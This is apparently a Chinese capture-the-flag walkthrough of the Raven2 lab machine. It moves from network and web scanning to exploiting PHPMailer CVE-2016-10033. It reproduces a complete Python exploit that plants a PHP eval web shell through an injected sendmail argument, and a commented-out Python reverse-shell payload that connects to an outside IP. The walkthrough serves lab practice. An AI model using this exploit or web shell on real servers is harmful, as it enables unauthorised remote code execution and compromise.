Ranven2 靶机

靶机搭建后网卡同一设置成 NAT 模式

查询主机 IP

通过 Nmap 进行同一网段下主机 IP 扫描 （之前扫错网段 192.168.0.0 所以没有扫描成功）

nmap -sn 192.168.5.0/24

找到目标 IP：

http://192.168.5.144/

对 IP 地址进行扫描，找到开放端口等信息

使用 Xray 进行漏洞扫描

Xray 扫描结果：

http://192.168.5.144/.DS_Store

通过 afrog 扫描到以下信息

很有可能存在 RCE 漏洞

Index of /js

用 Xray 再次漏扫：

xray_windows_amd64.exe webscan --basic-crawler http://192.168.5.144/ --html-output 2.html

使用御剑进行后台扫描：

http://192.168.5.144/manual/en/index.html
http://192.168.5.144/css/
http://192.168.5.144/img/
http://192.168.5.144/vendor/?C=S;O=A

通过 Index of /vendor 找到版本信息和 flag1

5.2.16
​
/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

通过 searchsploit 漏洞查找工具可知 PHPMailer 5.2.18 存在 RCE 漏洞

这也和 afrog 的查找结果相符

通过查找 PHPMailer 5.2.18 相关信息找到其漏洞编号和提权思路

通过运行 EXP 脚本获取 Shell 地址

"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
​
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
​
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
​
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
​
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
​
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
​
os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
​
# target = 'http://localhost:8080'
target = 'http://192.168.5.144/'
vuln = "/contact.php"
​
# backdoor = '/backdoor.php'
backdoor = '/shell.php'
​
# payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
payload = '<?php @eval($_REQUEST[777]);phpinfo();?>'
​
fields={'action': 'submit',
        'name': payload,
        # 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
        'message': 'Pwned'}
​
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
​
# headers={'User-Agent': 'curl/7.47.0',
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36',
​
         'Content-Type': m.content_type}
​
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
​
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
​
# r = requests.post(target, data=m.to_string(),
r = requests.post(target + vuln, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    # print('[+]  ExPLoITeD ' + target)
    print('[+] ExPLoITeD ' + target + backdoor)

http://192.168.5.144//shell.php     //shell地址

蚁剑连接

反弹shell ……没弹成功…………

止步于此……